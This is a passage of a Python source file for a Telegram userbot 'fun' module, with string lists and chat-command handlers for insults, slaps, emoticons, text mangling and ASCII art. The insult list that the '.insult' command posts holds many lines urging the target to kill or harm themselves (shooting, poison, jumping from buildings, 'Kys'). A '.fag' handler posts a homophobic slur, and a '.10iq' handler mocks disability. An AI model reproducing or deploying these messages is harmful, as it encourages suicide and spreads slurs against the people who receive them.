"If I wanted to kill myself I'd climb your ego and jump to your IQ.",
"Zombies eat brains... you're safe.",
"You didn't evolve from apes, they evolved from you.",
"Come back and talk to me when your I.Q. exceeds your age.",
"I'm not saying you're stupid, I'm just saying you've got bad luck when it comes to thinking.",
"What language are you speaking? Cause it sounds like bullshit.",
"Stupidity is not a crime so you are free to go.",
"You are proof that evolution CAN go in reverse.",
"I would ask you how old you are but I know you can't count that high.",
"As an outsider, what do you think of the human race?",
"Brains aren't everything. In your case they're nothing.",
"Ordinarily people live and learn. You just live.",
"I don't know what makes you so stupid, but it really works.",
"Keep talking, someday you'll say something intelligent! (I doubt it though)",
"Shock me, say something intelligent.",
"Your IQ's lower than your shoe size.",
"Alas! Your neurotransmitters are no more working.",
"Are you crazy you fool.",
"Everyone has the right to be stupid but you are abusing the privilege.",
"I'm sorry I hurt your feelings when I called you stupid. I thought you already knew that.",
"You should try tasting cyanide.",
"Your enzymes are meant to digest rat poison.",
"You should try sleeping forever.",
"Pick up a gun and shoot yourself.",
"You could make a world record by jumping from a plane without parachute.",
"Stop talking BS and jump in front of a running bullet train.",
"Try bathing with Hydrochloric Acid instead of water.",
"Try this: if you hold your breath underwater for an hour, you can then hold it forever.",
"Go Green! Stop inhaling Oxygen.",
"God was searching for you. You should leave to meet him.",
"give your 100%. Now, go donate blood.",
"Try jumping from a hundred story building but you can do it only once.",
"You should donate your brain seeing that you never used it.",
"Volunteer for target in an firing range.",
"Head shots are fun. Get yourself one.",
"You should try swimming with great white sharks.",
"You should paint yourself red and run in a bull marathon.",
"You can stay underwater for the rest of your life without coming back up.",
"How about you stop breathing for like 1 day? That'll be great.",
"Try provoking a tiger while you both are in a cage.",
"Have you tried shooting yourself as high as 100m using a canon.",
"You should try holding TNT in your mouth and igniting it.",
"Try playing catch and throw with RDX its fun.",
"I heard phogine is poisonous but i guess you wont mind inhaling it for fun.",
"Launch yourself into outer space while forgetting oxygen on Earth.",
"You should try playing snake and ladders, with real snakes and no ladders.",
"Dance naked on a couple of HT wires.",
"Active Volcano is the best swimming pool for you.",
"You should try hot bath in a volcano.",
"Try to spend one day in a coffin and it will be yours forever.",
"Hit Uranium with a slow moving neutron in your presence. It will be a worthwhile experience.",
"You can be the first person to step on sun. Have a try.",
]
UWUS = [
"(・`ω´・)",
";;w;;",
"owo",
"UwU",
">w<",
"^w^",
r"\(^o\) (/o^)/",
"( ^ _ ^)∠☆",
"(ô_ô)",
"~:o",
";-;",
"(*^*)",
"(>_",
"(♥_♥)",
"*(^O^)*",
"((+_+))",
]
FACEREACTS = [
"ʘ‿ʘ",
"ヾ(-_- )ゞ",
"(っ˘ڡ˘ς)",
"(´ж`ς)",
"( ಠ ʖ̯ ಠ)",
"(° ͜ʖ͡°)╭∩╮",
"(ᵟຶ︵ ᵟຶ)",
"(งツ)ว",
"ʚ(•`",
"(っ▀¯▀)つ",
"(◠﹏◠)",
"( ͡ಠ ʖ̯ ͡ಠ)",
"( ఠ ͟ʖ ఠ)",
"(∩`-´)⊃━☆゚.*・。゚",
"(⊃。•́‿•̀。)⊃",
"(._.)",
"{•̃_•̃}",
"(ᵔᴥᵔ)",
"♨_♨",
"⥀.⥀",
"ح˚௰˚づ ",
"(҂◡_◡)",
"ƪ(ړײ)ƪ",
"(っ•́。•́)♪♬",
"◖ᵔᴥᵔ◗ ♪ ♫ ",
"(☞゚ヮ゚)☞",
"[¬º-°]¬",
"(Ծ‸ Ծ)",
"(•̀ᴗ•́)و ̑̑",
"ヾ(´〇`)ノ♪♪♪",
"(ง'̀-'́)ง",
"ლ(•́•́ლ)",
"ʕ •́؈•̀ ₎",
"♪♪ ヽ(ˇ∀ˇ )ゞ",
"щ(゚Д゚щ)",
"( ˇ෴ˇ )",
"눈_눈",
"(๑•́ ₃ •̀๑) ",
"( ˘ ³˘)♥ ",
"ԅ(≖‿≖ԅ)",
"♥‿♥",
"◔_◔",
"⁽⁽ଘ( ˊᵕˋ )ଓ⁾⁾",
"乁( ◔ ౪◔)「 ┑( ̄Д  ̄)┍",
"( ఠൠఠ )ノ",
"٩(๏_๏)۶",
"┌(ㆆ㉨ㆆ)ʃ",
"ఠ_ఠ",
"(づ。◕‿‿◕。)づ",
"(ノಠ ∩ಠ)ノ彡( \\o°o)\\",
"“ヽ(´▽`)ノ”",
"༼ ༎ຶ ෴ ༎ຶ༽",
"。゚( ゚இ‸இ゚)゚。",
"(づ ̄ ³ ̄)づ",
"(⊙.☉)7",
"ᕕ( ᐛ )ᕗ",
"t(-_-t)",
"(ಥ⌣ಥ)",
"ヽ༼ ಠ益ಠ ༽ノ",
"༼∵༽ ༼⍨༽ ༼⍢༽ ༼⍤༽",
"ミ●﹏☉ミ",
"(⊙_◎)",
"¿ⓧ_ⓧﮌ",
"ಠ_ಠ",
"(´・_・`)",
"ᕦ(ò_óˇ)ᕤ",
"⊙﹏⊙",
"(╯°□°)╯︵ ┻━┻",
r"¯\_(⊙︿⊙)_/¯",
"٩◔̯◔۶",
"°‿‿°",
"ᕙ(⇀‸↼‶)ᕗ",
"⊂(◉‿◉)つ",
"V•ᴥ•V",
"q(❂‿❂)p",
"ಥ_ಥ",
"ฅ^•ﻌ•^ฅ",
"ಥ﹏ಥ",
"( ^_^)o自自o(^_^ )",
"ಠ‿ಠ",
"ヽ(´▽`)/",
"ᵒᴥᵒ#",
"( ͡° ͜ʖ ͡°)",
"┬─┬ ノ( ゜-゜ノ)",
"ヽ(´ー`)ノ",
"☜(⌒▽⌒)☞",
"ε=ε=ε=┌(;*´Д`)ノ",
"(╬ ಠ益ಠ)",
"┬─┬⃰͡ (ᵔᵕᵔ͜ )",
"┻━┻ ︵ヽ(`Д´)ノ︵ ┻━┻",
r"¯\_(ツ)_/¯",
"ʕᵔᴥᵔʔ",
"(`・ω・´)",
"ʕ•ᴥ•ʔ",
"ლ(`ー´ლ)",
"ʕʘ̅͜ʘ̅ʔ",
"( ゚Д゚)",
r"¯\(°_o)/¯",
"(。◕‿◕。)",
]
RUNS_STR = [
"Runs to Thanos..",
"Runs far, far away from earth..",
"Running faster than Bolt coz i'mma userbot !!",
"Runs to Marie..",
"This Group is too cancerous to deal with.",
"Cya bois",
"Kys",
"I go away",
"I am just walking off, coz me is too fat.",
"I Fugged off!",
"Will run for chocolate.",
"I run because I really like food.",
"Running...\nbecause dieting is not an option.",
"Wicked fast runnah",
"If you wanna catch me, you got to be fast...\nIf you wanna stay with me, you got to be good...\nBut if you wanna pass me...\nYou've got to be kidding.",
"Anyone can run a hundred meters, it's the next forty-two thousand and two hundred that count.",
"Why are all these people following me?",
"Are the kids still chasing me?",
"Running a marathon...there's an app for that.",
]
CHASE_STR = [
"Where do you think you're going?",
"Huh? what? did they get away?",
"ZZzzZZzz... Huh? what? oh, just them again, nevermind.",
"Get back here!",
"Not so fast...",
"Look out for the wall!",
"Don't leave me alone with them!!",
"You run, you die.",
"Jokes on you, I'm everywhere",
"You're gonna regret that...",
"You could also try /kickme, I hear that's fun.",
"Go bother someone else, no-one here cares.",
"You can run, but you can't hide.",
"Is that all you've got?",
"I'm behind you...",
"You've got company!",
"We can do this the easy way, or the hard way.",
"You just don't get it, do you?",
"Yeah, you better run!",
"Please, remind me how much I care?",
"I'd run faster if I were you.",
"That's definitely the droid we're looking for.",
"May the odds be ever in your favour.",
"Famous last words.",
"And they disappeared forever, never to be seen again.",
"\"Oh, look at me! I'm so cool, I can run from a bot!\" - this person",
"Yeah yeah, just tap /kickme already.",
"Here, take this ring and head to Mordor while you're at it.",
"Legend has it, they're still running...",
"Unlike Harry Potter, your parents can't protect you from me.",
"Fear leads to anger. Anger leads to hate. Hate leads to suffering. If you keep running in fear, you might "
"be the next Vader.",
"Multiple calculations later, I have decided my interest in your shenanigans is exactly 0.",
"Legend has it, they're still running.",
"Keep it up, not sure we want you here anyway.",
"You're a wiza- Oh. Wait. You're not Harry, keep moving.",
"NO RUNNING IN THE HALLWAYS!",
"Hasta la vista, baby.",
"Who let the dogs out?",
"It's funny, because no one cares.",
"Ah, what a waste. I liked that one.",
"Frankly, my dear, I don't give a damn.",
"My milkshake brings all the boys to yard... So run faster!",
"You can't HANDLE the truth!",
"A long time ago, in a galaxy far far away... Someone would've cared about that. Not anymore though.",
"Hey, look at them! They're running from the inevitable banhammer... Cute.",
"Han shot first. So will I.",
"What are you running after, a white rabbit?",
"As The Doctor would say... RUN!",
]
HELLOSTR = [
"Hi !",
"‘Ello, gov'nor!",
"What’s crackin’?",
"‘Sup, homeslice?",
"Howdy, howdy ,howdy!",
"Hello, who's there, I'm talking.",
"You know who this is.",
"Yo!",
"Whaddup.",
"Greetings and salutations!",
"Hello, sunshine!",
"Hey, howdy, hi!",
"What’s kickin’, little chicken?",
"Peek-a-boo!",
"Howdy-doody!",
"Hey there, freshman!",
"I come in peace!",
"Ahoy, matey!",
"Hiya!",
]
SHGS = [
"┐(´д`)┌",
"┐(´~`)┌",
"┐(´ー`)┌",
"┐( ̄ヘ ̄)┌",
"╮(╯∀╰)╭",
"╮(╯_╰)╭",
"┐(´д`)┌",
"┐(´∀`)┌",
"ʅ(́◡◝)ʃ",
"┐(゚~゚)┌",
"┐('д')┌",
"┐(‘~`;)┌",
"ヘ(´-`;)ヘ",
"┐( -“-)┌",
"ʅ(´◔౪◔)ʃ",
"ヽ(゜~゜o)ノ",
"ヽ(~~~ )ノ",
"┐(~ー~;)┌",
"┐(-。ー;)┌",
r"¯\_(ツ)_/¯",
r"¯\_(⊙_ʖ⊙)_/¯",
r"¯\_༼ ಥ ‿ ಥ ༽_/¯",
"乁( ⁰͡ Ĺ̯ ⁰͡ ) ㄏ",
]
CRI = [
"أ‿أ",
"╥﹏╥",
"(;﹏;)",
"(ToT)",
"(┳Д┳)",
"(ಥ﹏ಥ)",
"(;へ:)",
"(T_T)",
"(πーπ)",
"(T▽T)",
"(⋟﹏⋞)",
"(iДi)",
"(´Д⊂ヽ",
"(;Д;)",
"(>﹏<)",
"(TдT)",
"(つ﹏⊂)",
"༼☯﹏☯༽",
"(ノ﹏ヽ)",
"(ノAヽ)",
"(╥_╥)",
"(T⌓T)",
"(༎ຶ⌑༎ຶ)",
"(☍﹏⁰)。",
"(ಥ_ʖಥ)",
"(つд⊂)",
"(≖͞_≖̥)",
"(இ﹏இ`。)",
"༼ಢ_ಢ༽",
"༼ ༎ຶ ෴ ༎ຶ༽",
]
SLAP_TEMPLATES = [
"{hits} {victim} with a {item}.",
"{hits} {victim} in the face with a {item}.",
"{hits} {victim} around a bit with a {item}.",
"{throws} a {item} at {victim}.",
"grabs a {item} and {throws} it at {victim}'s face.",
"{hits} a {item} at {victim}.", "{throws} a few {item} at {victim}.",
"grabs a {item} and {throws} it in {victim}'s face.",
"launches a {item} in {victim}'s general direction.",
"sits on {victim}'s face while slamming a {item} {where}.",
"starts slapping {victim} silly with a {item}.",
"pins {victim} down and repeatedly {hits} them with a {item}.",
"grabs up a {item} and {hits} {victim} with it.",
"starts slapping {victim} silly with a {item}.",
"holds {victim} down and repeatedly {hits} them with a {item}.",
"prods {victim} with a {item}.",
"picks up a {item} and {hits} {victim} with it.",
"ties {victim} to a chair and {throws} a {item} at them.",
"{hits} {victim} {where} with a {item}.",
"ties {victim} to a pole and whips them {where} with a {item}."
"gave a friendly push to help {victim} learn to swim in lava.",
"sent {victim} to /dev/null.", "sent {victim} down the memory hole.",
"beheaded {victim}.", "threw {victim} off a building.",
"replaced all of {victim}'s music with Nickelback.",
"spammed {victim}'s email.", "made {victim} a knuckle sandwich.",
"slapped {victim} with pure nothing.",
"hit {victim} with a small, interstellar spaceship.",
"quickscoped {victim}.", "put {victim} in check-mate.",
"RSA-encrypted {victim} and deleted the private key.",
"put {victim} in the friendzone.",
"slaps {victim} with a DMCA takedown request!"
]
ITEMS = [
"cast iron skillet",
"large trout",
"baseball bat",
"cricket bat",
"wooden cane",
"nail",
"printer",
"shovel",
"pair of trousers",
"CRT monitor",
"diamond sword",
"baguette",
"physics textbook",
"toaster",
"portrait of Richard Stallman",
"television",
"mau5head",
"five ton truck",
"roll of duct tape",
"book",
"laptop",
"old television",
"sack of rocks",
"rainbow trout",
"cobblestone block",
"lava bucket",
"rubber chicken",
"spiked bat",
"gold block",
"fire extinguisher",
"heavy rock",
"chunk of dirt",
"beehive",
"piece of rotten meat",
"bear",
"ton of bricks",
]
THROW = [
"throws",
"flings",
"chucks",
"hurls",
]
HIT = [
"hits",
"whacks",
"slaps",
"smacks",
"bashes",
]
WHERE = ["in the chest", "on the head", "on the butt", "on the crotch"]
# ===========================================
@register(outgoing=True, pattern=r"^.(\w+)say (.*)")
async def univsaye(cowmsg):
""" For .cowsay module, userbot wrapper for cow which says things. """
arg = cowmsg.pattern_match.group(1).lower()
text = cowmsg.pattern_match.group(2)
if arg == "cow":
arg = "default"
if arg not in cow.COWACTERS:
return
cheese = cow.get_cow(arg)
cheese = cheese()
await cowmsg.edit(f"`{cheese.milk(text).replace('`', '´')}`")
@register(outgoing=True, pattern="^:/$", ignore_unsafe=True)
async def kek(keks):
""" Check yourself ;)"""
uio = ["/", "\\"]
for i in range(1, 15):
time.sleep(0.3)
await keks.edit(":" + uio[i % 2])
@register(outgoing=True, pattern=r"^.coinflip (.*)")
async def coin(event):
r = choice(["heads", "tails"])
input_str = event.pattern_match.group(1)
if input_str:
input_str = input_str.lower()
if r == "heads":
if input_str == "heads":
await event.edit(
"The coin landed on: **Heads**.\nYou were correct.")
elif input_str == "tails":
await event.edit(
"The coin landed on: **Heads**.\nYou weren't correct, try again ..."
)
else:
await event.edit("The coin landed on: **Heads**.")
elif r == "tails":
if input_str == "tails":
await event.edit(
"The coin landed on: **Tails**.\nYou were correct.")
elif input_str == "heads":
await event.edit(
"The coin landed on: **Tails**.\nYou weren't correct, try again ..."
)
else:
await event.edit("The coin landed on: **Tails**.")
@register(pattern="^.slap(?: |$)(.*)", outgoing=True)
async def who(event):
""" slaps a user, or get slapped if not a reply. """
replied_user = await get_user_from_event(event)
if replied_user:
replied_user = replied_user[0]
else:
return
caption = await slap(replied_user, event)
try:
await event.edit(caption)
except BaseException:
await event.edit(
"`Can't slap this person, need to fetch some sticks and stones !!`"
)
async def slap(replied_user, event):
""" Construct a funny slap sentence !! """
user_id = replied_user.id
first_name = replied_user.first_name
username = replied_user.username
if username:
slapped = "@{}".format(username)
else:
slapped = f"[{first_name}](tg://user?id={user_id})"
temp = choice(SLAP_TEMPLATES)
item = choice(ITEMS)
hit = choice(HIT)
throw = choice(THROW)
where = choice(WHERE)
caption = "..." + temp.format(
victim=slapped, item=item, hits=hit, throws=throw, where=where)
return caption
@register(outgoing=True, pattern="^-_-$", ignore_unsafe=True)
async def lol(lel):
""" Ok... """
okay = "-_-"
for i in range(10):
okay = okay[:-1] + "_-"
await lel.edit(okay)
@register(outgoing=True, pattern="^.(yes|no|maybe|decide)$")
async def decide(event):
decision = event.pattern_match.group(1).lower()
message_id = event.reply_to_msg_id if event.reply_to_msg_id else None
if decision != "decide":
r = requests.get(f"https://yesno.wtf/api?force={decision}").json()
else:
r = requests.get(f"https://yesno.wtf/api").json()
await event.delete()
await event.client.send_message(event.chat_id,
str(r["answer"]).upper(),
reply_to=message_id,
file=r["image"])
@register(outgoing=True, pattern="^;_;$", ignore_unsafe=True)
async def fun(e):
t = ";_;"
for j in range(10):
t = t[:-1] + "_;"
await e.edit(t)
@register(outgoing=True, pattern="^.fp$")
async def facepalm(e):
""" Facepalm 🤦♂ """
await e.edit("🤦♂")
@register(outgoing=True, pattern="^.cry$")
async def cry(e):
""" y u du dis, i cry everytime !! """
await e.edit(choice(CRI))
@register(outgoing=True, pattern="^.insult$")
async def insult(e):
""" I make you cry !! """
await e.edit(choice(INSULT_STRINGS))
@register(outgoing=True, pattern="^.cp(?: |$)(.*)")
async def copypasta(cp_e):
""" Copypasta the famous meme """
textx = await cp_e.get_reply_message()
message = cp_e.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await cp_e.edit("`😂🅱️IvE👐sOME👅text👅for✌️Me👌tO👐MAkE👀iT💞funNy!💦`")
return
reply_text = choice(EMOJIS)
# choose a random character in the message to be substituted with 🅱️
b_char = choice(message).lower()
for owo in message:
if owo == " ":
reply_text += choice(EMOJIS)
elif owo in EMOJIS:
reply_text += owo
reply_text += choice(EMOJIS)
elif owo.lower() == b_char:
reply_text += "🅱️"
else:
if bool(getrandbits(1)):
reply_text += owo.upper()
else:
reply_text += owo.lower()
reply_text += choice(EMOJIS)
await cp_e.edit(reply_text)
@register(outgoing=True, pattern="^.vapor(?: |$)(.*)")
async def vapor(vpr):
""" Vaporize everything! """
reply_text = list()
textx = await vpr.get_reply_message()
message = vpr.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await vpr.edit("`Give some text for vapor!`")
return
for charac in message:
if 0x21 <= ord(charac) <= 0x7F:
reply_text.append(chr(ord(charac) + 0xFEE0))
elif ord(charac) == 0x20:
reply_text.append(chr(0x3000))
else:
reply_text.append(charac)
await vpr.edit("".join(reply_text))
@register(outgoing=True, pattern="^.str(?: |$)(.*)")
async def stretch(stret):
""" Stretch it."""
textx = await stret.get_reply_message()
message = stret.text
message = stret.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await stret.edit("`GiiiiiiiB sooooooomeeeeeee teeeeeeext!`")
return
count = randint(3, 10)
reply_text = sub(r"([aeiouAEIOUaeiouAEIOUаеиоуюяыэё])", (r"\1" * count),
message)
await stret.edit(reply_text)
@register(outgoing=True, pattern="^.zal(?: |$)(.*)")
async def zal(zgfy):
""" Invoke the feeling of chaos. """
reply_text = list()
textx = await zgfy.get_reply_message()
message = zgfy.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await zgfy.edit(
"`gͫ ̆ i̛ ̺ v͇̆ ȅͅ a̢ͦ s̴̪ c̸̢ ä̸ rͩͣ y͖͞ t̨͚ é̠ x̢͖ t͔͛`"
)
return
for charac in message:
if not charac.isalpha():
reply_text.append(charac)
continue
for _ in range(0, 3):
randint = randint(0, 2)
if randint == 0:
charac = charac.strip() + \
choice(ZALG_LIST[0]).strip()
elif randint == 1:
charac = charac.strip() + \
choice(ZALG_LIST[1]).strip()
else:
charac = charac.strip() + \
choice(ZALG_LIST[2]).strip()
reply_text.append(charac)
await zgfy.edit("".join(reply_text))
@register(outgoing=True, pattern="^.hi$")
async def hoi(hello):
""" Greet everyone! """
await hello.edit(choice(HELLOSTR))
@register(outgoing=True, pattern="^.owo(?: |$)(.*)")
async def faces(owo):
""" UwU """
textx = await owo.get_reply_message()
message = owo.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await owo.edit("` UwU no text given! `")
return
reply_text = sub(r"(r|l)", "w", message)
reply_text = sub(r"(R|L)", "W", reply_text)
reply_text = sub(r"n([aeiou])", r"ny\1", reply_text)
reply_text = sub(r"N([aeiouAEIOU])", r"Ny\1", reply_text)
reply_text = sub(r"\!+", " " + choice(UWUS), reply_text)
reply_text = reply_text.replace("ove", "uv")
reply_text += " " + choice(UWUS)
await owo.edit(reply_text)
@register(outgoing=True, pattern="^.react$")
async def react_meme(react):
""" Make your userbot react to everything. """
await react.edit(choice(FACEREACTS))
@register(outgoing=True, pattern="^.shg$")
async def shrugger(shg):
r""" ¯\_(ツ)_/¯ """
await shg.edit(choice(SHGS))
@register(outgoing=True, pattern="^.chase$")
async def police(chase):
""" Run boi run, i'm gonna catch you !! """
await chase.edit(choice(CHASE_STR))
@register(outgoing=True, pattern="^.run$")
async def runner_lol(run):
""" Run, run, RUNNN! """
await run.edit(choice(RUNS_STR))
@register(outgoing=True, pattern="^.metoo$")
async def metoo(hahayes):
""" Haha yes """
await hahayes.edit(choice(METOOSTR))
@register(outgoing=True, pattern="^Oof$")
async def Oof(e):
t = "Oof"
for j in range(15):
t = t[:-1] + "of"
await e.edit(t)
@register(outgoing=True, pattern="^.10iq$")
async def iqless(e):
await e.edit("♿")
@register(outgoing=True, pattern="^.fuck$")
async def iqless(e):
await e.edit("🖕🖕🖕🖕🖕🖕🖕🖕\n🖕🖕🖕🖕🖕🖕🖕🖕\n🖕🖕\n🖕🖕\n🖕🖕\n🖕🖕🖕🖕🖕🖕\n🖕🖕🖕🖕🖕🖕\n🖕🖕\n🖕🖕\n🖕🖕\n🖕🖕\n🖕🖕")
@register(outgoing=True, pattern="^.bye$")
async def iqless(e):
await e.edit("Kek thx bye")
@register(outgoing=True, pattern="^.moon$")
async def moon(event):
deq = deque(list("🌗🌘🌑🌒🌓🌔🌕🌖"))
try:
for x in range(32):
await sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
except BaseException:
return
@register(outgoing=True, pattern="^.earth$")
async def earth(event):
deq = deque(list("🌏🌍🌎🌎🌍🌏🌍🌎"))
try:
for x in range(32):
await sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
except BaseException:
return
@register(outgoing=True, pattern="^.clock$")
async def clock(event):
deq = deque(list("🕙🕘🕗🕖🕕🕔🕓🕒🕑🕐🕛"))
try:
for x in range(32):
await sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
except BaseException:
return
@register(outgoing=True, pattern="^.rain$")
async def rain(event):
deq = deque(list("☀️🌤⛅️🌥☁️🌧⛈"))
try:
for x in range(32):
await sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
except BaseException:
return
@register(outgoing=True, pattern="^.love$")
async def love(event):
deq = deque(list("❤️🧡💛💚💙💜🖤💕💞💓💗💖💘💝"))
try:
for x in range(32):
await sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
except BaseException:
return
@register(outgoing=True, pattern="^.mock(?: |$)(.*)")
async def spongemocktext(mock):
""" Do it and find the real fun. """
reply_text = list()
textx = await mock.get_reply_message()
message = mock.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await mock.edit("`gIvE sOMEtHInG tO MoCk!`")
return
for charac in message:
if charac.isalpha() and randint(0, 1):
to_app = charac.upper() if charac.islower() else charac.lower()
reply_text.append(to_app)
else:
reply_text.append(charac)
await mock.edit("".join(reply_text))
@register(outgoing=True, pattern="^.clap(?: |$)(.*)")
async def claptext(memereview):
""" Praise people! """
textx = await memereview.get_reply_message()
message = memereview.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await memereview.edit("`Hah, I don't clap pointlessly!`")
return
reply_text = "👏 "
reply_text += message.replace(" ", " 👏 ")
reply_text += " 👏"
await memereview.edit(reply_text)
@register(outgoing=True, pattern="^.bt$")
async def bluetext(bt_e):
""" Believe me, you will find this useful. """
if await bt_e.get_reply_message() and bt_e.is_group:
await bt_e.edit(
"/BLUETEXT /MUST /CLICK.\n"
"/ARE /YOU /A /STUPID /ANIMAL /WHICH /IS /ATTRACTED /TO /COLOURS?")
@register(outgoing=True, pattern=r"^.f (.*)")
async def payf(event):
paytext = event.pattern_match.group(1)
pay = "{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}".format(
paytext * 8, paytext * 8, paytext * 2, paytext * 2, paytext * 2,
paytext * 6, paytext * 6, paytext * 2, paytext * 2, paytext * 2,
paytext * 2, paytext * 2)
await event.edit(pay)
@register(outgoing=True, pattern="^.lfy (.*)")
async def let_me_google_that_for_you(lmgtfy_q):
textx = await lmgtfy_q.get_reply_message()
qry = lmgtfy_q.pattern_match.group(1)
if qry:
query = str(qry)
elif textx:
query = textx
query = query.message
query_encoded = query.replace(" ", "+")
lfy_url = f"http://lmgtfy.com/?s=g&iie=1&q={query_encoded}"
payload = {'format': 'json', 'url': lfy_url}
r = requests.get('http://is.gd/create.php', params=payload)
await lmgtfy_q.edit(f"Here you are, help yourself.\
\n[{query}]({r.json()['shorturl']})")
@register(pattern=r".scam(?: |$)(.*)", outgoing=True)
async def scam(event):
""" Just a small command to fake chat actions for fun !! """
options = [
'typing', 'contact', 'game', 'location', 'voice', 'round', 'video',
'photo', 'document', 'cancel'
]
input_str = event.pattern_match.group(1)
args = input_str.split()
if len(args) == 0: # Let bot decide action and time
scam_action = choice(options)
scam_time = randint(30, 60)
elif len(args) == 1: # User decides time/action, bot decides the other.
try:
scam_action = str(args[0]).lower()
scam_time = randint(30, 60)
except ValueError:
scam_action = choice(options)
scam_time = int(args[0])
elif len(args) == 2: # User decides both action and time
scam_action = str(args[0]).lower()
scam_time = int(args[1])
else:
await event.edit("`Invalid Syntax !!`")
return
try:
if (scam_time > 0):
await event.delete()
async with event.client.action(event.chat_id, scam_action):
await sleep(scam_time)
except BaseException:
return
@register(pattern=r".type(?: |$)(.*)", outgoing=True)
async def typewriter(typew):
""" Just a small command to make your keyboard become a typewriter! """
textx = await typew.get_reply_message()
message = typew.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await typew.edit("`Give a text to type!`")
return
sleep_time = 0.03
typing_symbol = "|"
old_text = ""
await typew.edit(typing_symbol)
await sleep(sleep_time)
for character in message:
old_text = old_text + "" + character
typing_text = old_text + "" + typing_symbol
await typew.edit(typing_text)
await sleep(sleep_time)
await typew.edit(old_text)
await sleep(sleep_time)
@register(outgoing=True, pattern="^.leave$")
async def leave(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`You must Leaving dis Group kek!`")
@register(outgoing=True, pattern="^.fail$")
async def fail(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ `"
"`\n████▌▄▌▄▐▐▌█████ `"
"`\n████▌▄▌▄▐▐▌▀████ `"
"`\n▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ `")
@register(outgoing=True, pattern="^.lol$")
async def lol(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n╱┏┓╱╱╱╭━━━╮┏┓╱╱╱╱ `"
"`\n╱┃┃╱╱╱┃╭━╮┃┃┃╱╱╱╱ `"
"`\n╱┃┗━━┓┃╰━╯┃┃┗━━┓╱ `"
"`\n╱┗━━━┛╰━━━╯┗━━━┛╱ `")
@register(outgoing=True, pattern="^.lool$")
async def lool(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n╭╭━━━╮╮┈┈┈┈┈┈┈┈┈┈\n┈┃╭━━╯┈┈┈┈▕╲▂▂╱▏┈\n┈┃┃╱▔▔▔▔▔▔▔▏╱▋▋╮┈`"
"`\n┈┃╰▏┃╱╭╮┃╱╱▏╱╱▆┃┈\n┈╰━▏┗━╰╯┗━╱╱╱╰┻┫┈\n┈┈┈▏┏┳━━━━▏┏┳━━╯┈`"
"`\n┈┈┈▏┃┃┈┈┈┈▏┃┃┈┈┈┈ `")
@register(outgoing=True, pattern="^.stfu$")
async def stfu(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n██████████████████████████████`"
"`\n██▀▀▀▀████▀▀▀▀████▀▀▀▀▀███▀▀██▀▀█`"
"`\n█──────██──────██───────██──██──█`"
"`\n█──██▄▄████──████──███▄▄██──██──█`"
"`\n█▄────▀████──████────█████──██──█`"
"`\n█▀▀██──████──████──███████──██──█`"
"`\n█──────████──████──███████──────█`"
"`\n██▄▄▄▄█████▄▄████▄▄████████▄▄▄▄██`"
"`\n█████████████████████████████████`")
@register(outgoing=True, pattern="^.gtfo$")
async def gtfo(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n███████████████████████████████ `"
"`\n█▀▀▀▀▀▀▀█▀▀▀▀▀▀█▀▀▀▀▀▀▀█▀▀▀▀▀▀█ `"
"`\n█───────█──────█───────█──────█ `"
"`\n█──███──███──███──███▄▄█──██──█ `"
"`\n█──███▄▄███──███─────███──██──█ `"
"`\n█──██───███──███──██████──██──█ `"
"`\n█──▀▀▀──███──███──██████──────█ `"
"`\n█▄▄▄▄▄▄▄███▄▄███▄▄██████▄▄▄▄▄▄█ `"
"`\n███████████████████████████████ `")
@register(outgoing=True, pattern="^.nih$")
async def nih(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n(\_/)`"
"`\n(•_•)`"
"`\n >🌹 *ini buat kamu`"
"`\n `"
"`\n(\_/)`"
"`\n(•_•)`"
"`\n🌹<\ *tapi boong`")
@register(outgoing=True, pattern="^.fag$")
async def gtfo(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n█████████`"
"`\n█▄█████▄█`"
"`\n█▼▼▼▼▼`"
"`\n█ STFU FAGGOT'S`"
"`\n█▲▲▲▲▲`"
"`\n█████████`"
"`\n ██ ██`")
@register(outgoing=True, pattern="^.taco$")
async def taco(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("\n{\__/}"
"\n(●_●)"
"\n( >🌮 Want a taco?")
@register(outgoing=True, pattern="^.paw$")
async def paw(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`(=ↀωↀ=)")
@register(outgoing=True, pattern="^.tf$")
async def tf(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("(̿▀̿ ̿Ĺ̯̿̿▀̿ ̿)̄ ")
@register(outgoing=True, pattern="^.gey$")
async def gey(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n┈┈┈╭━━━━━╮┈┈┈┈┈\n┈┈┈┃┊┊┊┊┊┃┈┈┈┈┈`"
"`\n┈┈┈┃┊┊╭━╮┻╮┈┈┈┈\n┈┈┈╱╲┊┃▋┃▋┃┈┈┈┈\n┈┈╭┻┊┊╰━┻━╮┈┈┈┈`"
